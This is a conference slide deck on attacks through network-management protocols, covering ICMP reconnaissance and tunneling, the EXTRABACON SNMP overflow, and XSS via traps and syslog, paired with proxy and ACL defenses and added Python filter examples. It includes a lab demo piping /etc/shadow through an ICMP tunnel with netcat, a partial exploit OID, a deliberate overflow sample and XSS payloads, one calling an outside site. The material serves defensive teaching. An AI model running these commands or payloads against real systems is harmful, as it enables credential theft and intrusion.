The Red Headed Step Children: ICMP, SNMP and other network management protocols
Download: www.tavve.com/swd

Chuck Craft
Tavve Software
[email protected]
@bubbasnmp
16.09.28



Overview

• ICMP – Discovery/Recon, Covert Channel

• SNMP Polling - EXTRABACON

• SNMP Traps/Syslog – Cross-site Scripting

What I do

(word cloud on the slide) ICMP, SNMP, SNMPv3, syslog, TACACS, ssh, telnet, RDP, NTP, traps, NetFlow, Radius, https, sftp, scp, SIEM, NMS, NPM, DMZ, Air gap

Overview

• ICMP – Discovery/Recon, Covert Channel

• SNMP Polling - EXTRABACON

• SNMP Traps/Syslog – Cross-site Scripting

ICMP (Internet Control Message Protocol)

• RFC-792 – “ICMP, uses the basic support of IP as if it were a higher level protocol, however, ICMP is actually an integral part of IP, and must be implemented by every IP module.”

• Internet Protocol Number = 1 (TCP = 6, UDP = 17)

ICMP Header

Echo or Echo Reply Message

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |   - used by all ICMP
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           Identifier          |        Sequence Number        |   - varies by TYPE
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Data ...                                                       - varies by TYPE
+-+-+-+-+-

• Type (8 bits) x Code (8 bits) = 65,536 possible ICMP message formats

• Today talking about Type 8 (echo Request), Type 0 (echo Reply) and Type 11 (Time Exceeded)

• Other often seen messages = Type 3 (Destination Unreachable) and Type 5 (Redirect)

Whitehat ICMP

• Availability (“ping”) – up/down – echo/reply
• Latency (Round Trip Time) – RFC-889
• Applications (eHealth, Solarwinds, ?) – ping before SNMP polling
• traceroute – path to host
• MTU roulette (packet size)

ICMP utilities – ping

• “The Story of the PING Program”

http://ftp.arl.army.mil/~mike/ping.html


ICMP utilities – traceroute

• Default is to use UDP. Add “-I” flag to use ICMP ECHO.
• Microsoft “tracert” uses ICMP by default (no option to change protocol).
• Uses the TTL (Time to Live) field in the IP header. Originally seconds. Renamed to Hop Limit in IPv6.

# traceroute -I -n 8.8.8.8
traceroute to 8.8.8.8 (8.8.8.8), 30 hops max, 60 byte packets
 1  xxx.xxx.xxx.xxx  1.981 ms  2.943 ms  2.952 ms        <- Type 8 (echo) sent / Type 11 (Time Exceeded) received
 2  xxx.xxx.xxx.xxx  3.394 ms  3.404 ms  4.017 ms
 3  xxx.xxx.xxx.xxx  89.191 ms  89.221 ms  90.041 ms
 4  65.120.10.97  90.049 ms  90.050 ms  90.050 ms
 5  205.171.166.33  90.050 ms  117.057 ms  117.088 ms
 6  * * *                                               <- Type 8 (echo) sent / no response received
 7  209.85.143.188  112.775 ms  112.504 ms  112.270 ms
 8  209.85.143.61  111.980 ms  58.631 ms  58.264 ms
 9  209.85.244.209  83.153 ms  82.882 ms  99.668 ms
10  216.239.49.33  81.940 ms  81.332 ms  74.274 ms
11  * * *
12  8.8.8.8  208.090 ms  207.866 ms  205.455 ms          <- Type 8 (echo) sent / Type 0 (echo Reply) received

Blackhat ICMP

How can attacker use ICMP for reconnaissance? – KoonYaw Tan (SANS)
  4. Non-Conventional use
     – 4.1 Reconnaissance
     – 4.2 Denial of Service (DoS)
     – 4.3 Covert Channel
  (https://www.sans.org/security-resources/idfaq/how-can-attacker-use-icmp-for-reconnaissance/3/13)

Project Loki: ICMP Tunneling (http://phrack.org/issues/49/6.html)

ICMP Usage in Scanning (Version 3.0-2001) – Ofir Arkin

ICMP based remote OS TCP/IP stack fingerprinting techniques (http://www.phrack.org/archives/issues/57/7.txt)

Unsolicited ICMP (nmap)

# nmap -v -A 192.168.200.50      (HP printer)

Destination Unreachable Message

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                             unused                            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|      Internet Header + 64 bits of Original Data Datagram      |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

OS Fingerprinting (ping data)

[Slide compares the echo-request data sent by Windows 10 and by Centos 6.7; only the two labels survive in the transcript.]

Covert Channels / Exfil

• (extensible) Data Exfiltration Toolkit (DET) https://github.com/sensepost/DET

• Many ICMP tunnel programs.

https://en.wikipedia.org/wiki/ICMP_tunnel

icmptx – ICMP tunnel

Centos install: (Current status of RepoForge / RPMForge???)
# curl -O http://mirror.hmc.edu/repoforge/redhat/el6/en/x86_64/rpmforge/RPMS/icmptx-0.01-2.el6.rf.x86_64.rpm
# rpm -Uvh ./icmptx-0.01-2.el6.rf.x86_64.rpm

ARM/Kali (Debian) install:
- download code: https://github.com/jakkarth/icmptx
- icmptx.c: change tunnel ID from 7537 to 7530
    /* run_icmp_tunnel(7537, mtu, !strcmp(argv[1],"-s"), argv[2], tun_fd); */
    run_icmp_tunnel(7530, mtu, !strcmp(argv[1],"-s"), argv[2], tun_fd);
- build new binary with “make”

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           Identifier          |        Sequence Number        |   - ID must match on both ends
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Data ...
+-+-+-+-+-


icmptx – Test setup   (-c = client, -s = server)

xxx.xxx.xxx.233  Centos 6.7 VM  (client)
# icmptx -c 192.168.200.154
Created tunnel device: tun0
# ifconfig -a | grep -i tun
tun0      Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
# ifconfig tun0 inet 10.0.3.2 netmask 255.255.255.0
# netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
10.0.3.0        0.0.0.0         255.255.255.0   U         0 0          0 tun0
xxx.xxx.xxx.0   0.0.0.0         255.255.255.0   U         0 0          0 eth0
169.254.0.0     0.0.0.0         255.255.0.0     U         0 0          0 eth0
0.0.0.0         xxx.xxx.xxx.1   0.0.0.0         UG        0 0          0 eth0
# cat /etc/shadow | nc 10.0.3.1 8023
# wc -c /etc/shadow
584 /etc/shadow

xxx.xxx.xxx.154  Pi/ARM/Kali/Debian  (server)
~/icmptx/icmptx-0.2# ./icmptx -s 192.168.200.154
# ifconfig -a | grep -i tun
tun0: flags=4240<POINTOPOINT,NOARP,MULTICAST>  mtu 1500
# ifconfig tun0 inet 10.0.3.1 netmask 255.255.255.0
# netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         xxx.xxx.xxx.1   0.0.0.0         UG        0 0          0 eth0
10.0.3.0        0.0.0.0         255.255.255.0   U         0 0          0 tun0
xxx.xxx.xxx.0   0.0.0.0         255.255.255.0   U         0 0          0 eth0
# nc -l -p 8023
root:$6$MbrMNBHW$kNleGvjhRY6yRM<snip>:16908:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
lp:*:15980:0:99999:7:::
sync:*:15980:0:99999:7:::
<snip>

icmptx – Packet capture

icmptx – data decode

Trust No One – Verify All Received (Stateful FW or ICMP Proxy)

Echo or Echo Reply Message (Type 0)

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           Identifier          |        Sequence Number        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Data ...
+-+-+-+-+-

Need outstanding: ICMP Type 8 with matching ID and Sequence

Time Exceeded Message (Type 11)

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                             unused                            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|      Internet Header + 64 bits of Original Data Datagram      |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Need outstanding: Outgoing packet matching IP header and Datagram (could be non-ICMP)

Destination Unreachable Message (Type 3)

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                             unused                            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|      Internet Header + 64 bits of Original Data Datagram      |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Need outstanding: Outgoing packet matching IP header and Datagram

Scrub outgoing ICMP data

[Diagram: management servers 10.10.10.10, 10.10.10.11, 10.10.10.12 ping the managed node 20.20.20.20 through three deployments]
• Normal IP Routing – No data cleanup
• FW NATs internal (20.20.20.10) – No data cleanup
• ICMP Proxy (20.20.20.15) – Packet recreated. Options to maintain, replace or resize data field.
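What the last three slides ask of a stateful firewall or ICMP proxy, as an added Python example (this is not code from the talk or from Tavve's products): parse the common ICMP header and verify its checksum, admit a Type 0 reply only while a Type 8 with the same Identifier and Sequence Number is outstanding, admit a Type 11 or Type 3 only when the quoted IP header and 64 bits of data match a datagram that actually went out, and rebuild outbound echo requests with a scrubbed data field. Packet bytes, addresses and IP identifiers are constructed for the example. The quoted-datagram match skips TTL and IP header checksum on purpose: the router that quotes a datagram back has already decremented its TTL.

```python
import struct

ICMP_ECHO_REPLY, ICMP_DEST_UNREACH, ICMP_ECHO, ICMP_TIME_EXCEEDED = 0, 3, 8, 11

def icmp_checksum(data):
    """RFC 1071 one's-complement sum of 16-bit words; an odd trailing byte is zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_echo(icmp_type, ident, seq, payload):
    """Type 8 / Type 0: Type | Code | Checksum | Identifier | Sequence Number | Data."""
    body = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload
    return body[:2] + struct.pack("!H", icmp_checksum(body)) + body[4:]

def build_error(icmp_type, code, quoted):
    """Type 3 / Type 11: Type | Code | Checksum | unused | Internet Header + 64 bits of datagram."""
    body = struct.pack("!BBHI", icmp_type, code, 0, 0) + quoted[:28]
    return body[:2] + struct.pack("!H", icmp_checksum(body)) + body[4:]

def parse_icmp(pkt):
    """Split the 4-byte common header from the type-specific part and verify the checksum."""
    if len(pkt) < 8:
        raise ValueError("ICMP message shorter than 8 bytes")
    if icmp_checksum(pkt) != 0:  # a correct packet sums to zero once its own checksum is included
        raise ValueError("bad ICMP checksum")
    msg = {"type": pkt[0], "code": pkt[1]}
    if msg["type"] in (ICMP_ECHO, ICMP_ECHO_REPLY):
        msg["id"], msg["seq"] = struct.unpack("!HH", pkt[4:8])
        msg["data"] = pkt[8:]
    else:
        msg["orig"] = pkt[8:]  # quoted IP header + first 64 bits of the datagram that triggered it
    return msg

def dgram_key(quoted):
    """Identity of a datagram that survives transit: src, dst, protocol, IP identification and the
    8 bytes after the IP header. TTL and header checksum are skipped: routers decrement the TTL."""
    return (quoted[12:16], quoted[16:20], quoted[9:10], quoted[4:6], quoted[20:28])

# Constructed 20-byte IPv4 header without options; header checksum left zero for the sample.
def fake_ip_header(src, dst, ip_id, proto=1, ttl=64):
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 0, ip_id, 0, ttl, proto, 0, src, dst)

class IcmpStateFilter:
    """Forward inbound ICMP only if it answers something seen going out (stateful FW / ICMP proxy)."""
    def __init__(self, scrub_data=True):
        self.echo_pending = set()   # (Identifier, Sequence Number) of Type 8 forwarded outbound
        self.dgram_pending = set()  # dgram_key() of every outbound datagram, ICMP or not
        self.scrub_data = scrub_data

    def outbound(self, ip_header, transport):
        """Record the datagram; optionally zero an echo request's data field. Returns bytes to send."""
        if ip_header[9] == 1:  # protocol 1 = ICMP
            msg = parse_icmp(transport)
            if msg["type"] == ICMP_ECHO:
                self.echo_pending.add((msg["id"], msg["seq"]))
                if self.scrub_data:
                    transport = build_echo(ICMP_ECHO, msg["id"], msg["seq"], b"\x00" * len(msg["data"]))
        self.dgram_pending.add(dgram_key(ip_header + transport[:8]))
        return transport

    def inbound(self, transport):
        """Return (allowed, reason) for an inbound ICMP message."""
        try:
            msg = parse_icmp(transport)
        except ValueError as exc:
            return False, str(exc)
        if msg["type"] == ICMP_ECHO_REPLY:
            key = (msg["id"], msg["seq"])
            if key in self.echo_pending:
                self.echo_pending.discard(key)  # one reply per request; a replay is dropped
                return True, "matches outstanding echo request"
            return False, "echo reply with no outstanding request"
        if msg["type"] in (ICMP_DEST_UNREACH, ICMP_TIME_EXCEEDED):
            if dgram_key(msg["orig"]) in self.dgram_pending:
                return True, "quotes a datagram we sent"
            return False, "quotes a datagram we never sent"
        return False, "unsolicited ICMP type %d" % msg["type"]

def run_demo():
    """Constructed exchange: management server 10.10.10.10 pings node 20.20.20.20 through the filter."""
    nms, node = bytes([10, 10, 10, 10]), bytes([20, 20, 20, 20])
    flt, payload = IcmpStateFilter(scrub_data=True), b"bytes-a-tunnel-would-hide"
    sent = flt.outbound(fake_ip_header(nms, node, ip_id=0x1234), build_echo(ICMP_ECHO, 0x4242, 1, payload))
    zeros = b"\x00" * len(payload)
    results = {"scrubbed": parse_icmp(sent)["data"] == zeros}
    reply = build_echo(ICMP_ECHO_REPLY, 0x4242, 1, zeros)
    results["good_reply"] = flt.inbound(reply)[0]
    results["replayed_reply"] = flt.inbound(reply)[0]  # the same request cannot be answered twice
    results["stray_reply"] = flt.inbound(build_echo(ICMP_ECHO_REPLY, 7530, 1, b"x"))[0]  # unknown Identifier
    quoted = fake_ip_header(nms, node, ip_id=0x1234, ttl=63) + sent[:8]  # a router already decremented TTL
    results["ttl_exceeded"] = flt.inbound(build_error(ICMP_TIME_EXCEEDED, 0, quoted))[0]
    bogus = fake_ip_header(nms, node, ip_id=0x9999) + sent[:8]  # IP identification we never used
    results["bogus_unreach"] = flt.inbound(build_error(ICMP_DEST_UNREACH, 1, bogus))[0]
    results["inbound_ping"] = flt.inbound(build_echo(ICMP_ECHO, 1, 1, b""))[0]
    return results
```

Each outstanding request is consumed by exactly one reply, so the replayed reply and the reply carrying an Identifier nobody asked for are both dropped. With scrub_data=True the data field, which the slides leave untouched under normal routing and under NAT, leaves the proxy as zeros, which removes the outbound half of an icmptx-style channel; a proxy that also rewrites the data of the replies it forwards closes the return half.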

Internal Address Hiding

[Diagram: echo request from the management server 10.10.10.10 to the managed node 20.20.20.20 through the same three deployments]
• Normal IP Routing – Request seen from 10.10.10.10
• FW NATs internal (20.20.20.10) – Request seen from 20.20.20.10
• ICMP Proxy (20.20.20.15) – Request seen from 20.20.20.15

Lock down nodes with ACLs

[Diagram: ACL on the managed node 20.20.20.20 for management servers 10.10.10.10, 10.10.10.11, 10.10.10.12 in the three deployments]
• Normal IP Routing – Multiple ACL entries: 10.10.10.10, 10.10.10.11, 10.10.10.12
• FW NATs internal (20.20.20.10) – One or more ACL entries (Static, Dynamic or Overload NAT?)
• ICMP Proxy (20.20.20.15) – One ACL entry: 20.20.20.15

Overview

• ICMP – Discovery/Recon, Covert Channel

• SNMP Polling - EXTRABACON

• SNMP Traps/Syslog – Cross-site Scripting

@bubbasnmp ???

• http://www.simple-times.org/

• Case, McCloghrie, Rose, Waldbusser et al

• Ask Dr. SNMP – Jeff Case: “That dog won't hunt.”

SNMP Vulnerabilities - 2002

http://www.simple-times.org/pub/simple-times/issues/10-1.html

The Quarterly Newsletter of SNMP Technology, Comment, and Events

Volume 10, Number 1 - December, 2002

The Story Behind the SNMP Vulnerabilities

Tiina Havana, OUSPG / Ari Takanen, OUSPG (University of Oulu - Finland)

“SNMP is an old and mature protocol with numerous vendors providing solutions for it and even more numerous parties providing critical services over it.”

“SNMP is also a complex protocol using an error prone ASN.1 encoding and containing various error prone data types over an unreliable network environment (UDP).”

“…. it was possible to prove that SNMP implementations were vulnerable and could be exploited if wanted.”

Shadow Brokers - 2016

“The new SNMP flaw, ….” “…. buffer overflow vulnerability”

“While Cisco has said all versions of ASA are affected by the underlying vulnerability in the Simple Network Messaging Protocol, the finding means that ExtraBacon poses a bigger threat than many security experts may have believed.”

EXTRABACON

https://blogs.cisco.com/security/shadow-brokers

“The EXTRABACON exploit targets a buffer overflow vulnerability in the SNMP code of the Cisco ASA, Cisco PIX, and Cisco Firewall Services Module.” “An attacker could exploit this vulnerability by sending crafted SNMP packets to an affected Cisco product.”

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp

“The attacker requires knowledge of the configured SNMP community string in SNMP version 1 and SNMP version 2c or a valid username and password for SNMP version 3.”

SNMP Agent / MIB

• SNMP: Simple Network Management Protocol

• MIB: Management Information Base

• Objects in MIB are addressed by OID (Object Identifier)

• SNMPv1, SNMPv2c: cleartext community string

• SNMPv3: more secure – encryption [1], time sensitive, engine IDs

[Diagram: the SNMP Manager on the Mgmt Server sends snmpget / snmpset to the SNMP Agent on the Managed Node; the agent listens on UDP 161 and answers with the snmpget response from its MIB; the agent sends asynchronous traps to the manager on UDP 162]

1. https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051

SNMP MIB tree / OIDs   dot(.)

ccitt(0)  iso(1)  joint-iso-ccitt(2)
          |
          std(0)  reg authority(1)  member body(2)  org(3)
                                                    |
                                                    dod(6)
                                                    |
                                                    internet(1)
                                                    |
          directory(1)  mgmt(2)  experimental(3)  private(4)
                        |
                        mib-2(1)
                        |
          system(1)  interfaces(2)  at(3)  ip(4)  icmp(5)  tcp(6)  udp(7)  egp(8)  ….
          |
          sysDescr(1)  sysObjectID(2)  sysUptime(3)  sysContact(4)  sysLocation(5)  ….

iso  org  dod  internet  mgmt  mib-2  system  sysDescr
 1    3    6      1        2     1      1        1       ->  .1.3.6.1.2.1.1.1.0 = TAVVE ZoneRanger v5.5

SNMP Private Enterprises   dot(.)

ccitt(0)  iso(1)  joint-iso-ccitt(2)
          |
          std(0)  reg authority(1)  member body(2)  org(3)
                                                    |
                                                    dod(6)
                                                    |
                                                    internet(1)
                                                    |
          directory(1)  mgmt(2)  experimental(3)  private(4)
                                                  |
                                                  enterprises(1)
                                                  |
          Reserved(0)  NxNetworks(1)  IBM(2)  CMU(3)  …..  Cisco(9)  HP(11)

oid = <ASN1_OID['.1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.57.47.5.173.53.165
.165.165.165.131.236.4.137.4.36.137.229
*** output omitted ****
44.144.144.144.144.144.144.141.123.131.9.139.124.36.20.139.7.255.224.144']>

Buffer Overflow

int add_num(char num1, char num2) {
    char stuff[100];
    char num_total;

    stuff[200] = 99;            /* index 200 is past the 100-byte buffer: writes outside the frame */
    num_total = num1 + num2;
    return num_total;
}

add_num:
    @ args = 0, pretend = 0, frame = 112
    @ frame_needed = 1, uses_anonymous_args = 0
    @ link register save eliminated.
    push    {r7}
    sub     sp, sp, #116        @ Local variables allocated
    add     r7, sp, #0
    mov     r3, r0
    mov     r2, r1
    strb    r3, [r7, #7]
    mov     r3, r2
    strb    r3, [r7, #6]
    movs    r3, #99
    strb    r3, [r7, #208]      @ Write to La La Land
    ldrb    r2, [r7, #7]
    ldrb    r3, [r7, #6]
    add     r3, r3, r2
    strb    r3, [r7, #111]
    ldrb    r3, [r7, #111]      @ zero_extendqisi2
    mov     r0, r3
    adds    r7, r7, #116
    mov     sp, r7
    @ sp needed
    ldr     r7, [sp], #4
    bx      lr

Make Your Own Bacon

https://blog.silentsignal.eu/2016/08/25/bake-your-own-extrabacon/

Recreating in lab

• Would a SNMP “View” protect against?

• Are the SNMP packets valid per RFC?

Scrub outgoing SNMP data

[Diagram: management servers 10.10.10.10, 10.10.10.11, 10.10.10.12 poll the managed node 20.20.20.20 through three deployments]
• Normal IP Routing – No data cleanup
• FW NATs internal (20.20.20.10) – No data cleanup
• SNMP Proxy (20.20.20.15) – Packet recreated. Verify meets RFC. Filter OIDs.
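An added Python example (not code from the talk or from Tavve's ZoneRanger) of the two checks this slide puts in the proxy, “verify meets RFC” and “filter OIDs”, together with the naming from the MIB tree slides above: BER encoding and decoding of OBJECT IDENTIFIER values with the SMIv2 limits from RFC 2578 (at most 128 sub-identifiers, each at most 2^32-1), rejection of non-minimal or truncated encodings, a longest-prefix name lookup over a small table built from the tree shown on the slides, and an SNMP-view style allow-list. The 68-arc OID used as the “overlong” input is constructed for the example and is not the EXTRABACON payload.

```python
# Name table assembled from the MIB tree on the slides (iso.org.dod.internet ...), for display only.
MIB_NAMES = {(1,): "iso", (1, 3): "org", (1, 3, 6): "dod", (1, 3, 6, 1): "internet",
             (1, 3, 6, 1, 2): "mgmt", (1, 3, 6, 1, 2, 1): "mib-2", (1, 3, 6, 1, 2, 1, 1): "system",
             (1, 3, 6, 1, 2, 1, 1, 1): "sysDescr", (1, 3, 6, 1, 2, 1, 2): "interfaces",
             (1, 3, 6, 1, 4): "private", (1, 3, 6, 1, 4, 1): "enterprises", (1, 3, 6, 1, 4, 1, 9): "cisco"}
MAX_SUBIDS, MAX_SUBID_VALUE = 128, 2 ** 32 - 1   # SMIv2 limits (RFC 2578)

def parse_oid(text):
    return tuple(int(x) for x in text.strip(".").split("."))  # ".1.3.6.1.2.1.1.1.0" -> arcs

def encode_length(n):  # BER definite length: short form below 128, else 0x80|N followed by N bytes
    if n < 0x80:
        return bytes([n])
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(raw)]) + raw

def decode_length(data, pos):  # returns (length, offset of the first content byte)
    first = data[pos]
    if first < 0x80:
        return first, pos + 1
    n = first & 0x7F
    if n == 0 or n > 4 or len(data) < pos + 1 + n:
        raise ValueError("indefinite, oversized or truncated length")
    return int.from_bytes(data[pos + 1:pos + 1 + n], "big"), pos + 1 + n

def encode_oid(arcs):
    """BER OBJECT IDENTIFIER (tag 0x06): first two arcs packed as 40*X+Y, the rest base-128 big-endian."""
    if len(arcs) < 2 or arcs[0] > 2 or (arcs[0] < 2 and arcs[1] > 39):
        raise ValueError("invalid leading arcs")
    body = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        while arc > 0x7F:
            arc >>= 7
            chunk.append(0x80 | (arc & 0x7F))
        body.extend(reversed(chunk))
    return bytes([0x06]) + encode_length(len(body)) + bytes(body)

def decode_oid(data):
    """Decode one BER OID, rejecting the forms an RFC-conformant sender never produces."""
    if not data or data[0] != 0x06:
        raise ValueError("not an OBJECT IDENTIFIER")
    length, pos = decode_length(data, 1)
    body = data[pos:pos + length]
    if length == 0 or len(body) != length:
        raise ValueError("empty or truncated OID")
    arcs, value, more = [], 0, False
    for b in body:
        if not more and b == 0x80:
            raise ValueError("non-minimal subidentifier (leading 0x80)")
        value, more = (value << 7) | (b & 0x7F), bool(b & 0x80)
        if not more:
            if value > MAX_SUBID_VALUE:
                raise ValueError("subidentifier exceeds 2^32-1")
            arcs.append(value)
            value = 0
    if more:
        raise ValueError("subidentifier runs past end of OID")
    first = arcs[0]
    arcs = ([first // 40, first % 40] if first < 80 else [2, first - 80]) + arcs[1:]
    if len(arcs) > MAX_SUBIDS:
        raise ValueError("more than %d subidentifiers" % MAX_SUBIDS)
    return tuple(arcs), pos + length

def oid_name(arcs):
    """Longest named prefix from MIB_NAMES, remaining arcs numeric: (1,3,6,1,2,1,1,1,0) -> sysDescr.0"""
    for n in range(len(arcs), 0, -1):
        if arcs[:n] in MIB_NAMES:
            return ".".join([MIB_NAMES[arcs[:n]]] + [str(a) for a in arcs[n:]])
    return ".".join(str(a) for a in arcs)

class OidView:
    """SNMP-view style allow-list a recreating proxy applies before forwarding: an OID passes only
    if it decodes cleanly, is short enough and sits under an included subtree."""
    def __init__(self, included, max_arcs=32):
        self.included = [parse_oid(p) for p in included]
        self.max_arcs = max_arcs

    def check(self, oid_ber):
        try:
            arcs, _ = decode_oid(oid_ber)
        except ValueError as exc:
            return False, "malformed: %s" % exc
        if len(arcs) > self.max_arcs:
            return False, "%d subidentifiers exceeds view limit %d" % (len(arcs), self.max_arcs)
        if not any(arcs[:len(p)] == p for p in self.included):
            return False, "outside view: " + oid_name(arcs)
        return True, oid_name(arcs)

def run_demo():
    """Constructed requests against a view that exposes only the system and interfaces groups."""
    view = OidView(["1.3.6.1.2.1.1", "1.3.6.1.2.1.2"], max_arcs=32)
    long_oid = (1, 3, 6, 1, 4, 1, 9, 9) + tuple(range(60))  # constructed 68-arc OID, not exploit bytes
    return {
        "sysDescr": view.check(encode_oid(parse_oid(".1.3.6.1.2.1.1.1.0"))),
        "enterprise": view.check(encode_oid(parse_oid("1.3.6.1.4.1.9.9.491.1.3.3.1.1.5"))),
        "overlong": view.check(encode_oid(long_oid)),
        "malformed": view.check(bytes([0x06, 0x03, 0x2B, 0x80, 0x06])),  # padded subidentifier
    }
```

The decoder refuses to forward anything it could not itself have encoded, so the device behind the proxy only ever parses OIDs that fit the SMIv2 limits; the view limit of 32 arcs is this example's own choice and sits well above what the system and interfaces groups need.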

SNMPv3 (encryption)

[Diagram: the same three deployments between management servers 10.10.10.10, 10.10.10.11, 10.10.10.12 and the managed node 20.20.20.20]
• Normal IP Routing – Mgmt. apps must support SNMPv3
• FW NATs internal (20.20.20.10) – Mgmt. apps must support SNMPv3
• SNMP Proxy (20.20.20.15) – Proxy can translate v1, v2c -> SNMPv3

Internal Address Hiding

[Diagram: SNMP request from the management server 10.10.10.10 to the managed node 20.20.20.20 through the three deployments]
• Normal IP Routing – Request seen from 10.10.10.10
• FW NATs internal (20.20.20.10) – Request seen from 20.20.20.10
• SNMP Proxy (20.20.20.15) – Request seen from 20.20.20.15

Lock down nodes with ACLs

[Diagram: ACL on the managed node 20.20.20.20 for management servers 10.10.10.10, 10.10.10.11, 10.10.10.12 in the three deployments]
• Normal IP Routing – Multiple ACL entries: 10.10.10.10, 10.10.10.11, 10.10.10.12
• FW NATs internal (20.20.20.10) – One or more ACL entries (Static, Dynamic or Overload NAT?)
• SNMP Proxy (20.20.20.15) – One ACL entry: 20.20.20.15

Overview

• ICMP – Discovery/Recon, Covert Channel

• SNMP Polling - EXTRABACON

• SNMP Traps/Syslog – Cross-site Scripting

SNMP traps

Asynchronous. Unsolicited.
[Diagram: managed node 20.20.20.20 configured with Trap Dest: 10.10.10.10 sends traps to UDP Port 162 on the management server 10.10.10.10]

Syslog

Asynchronous. Unsolicited.
[Diagram: managed node 20.20.20.20 configured with Syslog Dest: 10.10.10.10 sends syslog to UDP Port 514 on the management server 10.10.10.10]

Cross-Site Scripting (XSS)

https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

“Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.”

Examples:

<script>alert("TEST");</script>

<body onload=alert('test1')>

<img src=http://badsite.net/gotya.swf>

<IMG SRC=j&#X41vascript:alert('test2')> (a=&#X41 (UTF-8))

Data Validation

(https://twitter.com/sempf/status/514473420277694465) (https://www.sempf.net/post/On-Testing1.aspx)

Rapid7 Research

Rapid7 Identifier   CVE Identifier   Class           Vendor      Patched
R7-2016-11.1        CVE-2016-5073    XSS             CloudView   Version 2.10a
R7-2016-11.2        CVE-2016-5073    XSS             Cloudview   Version 2.10a
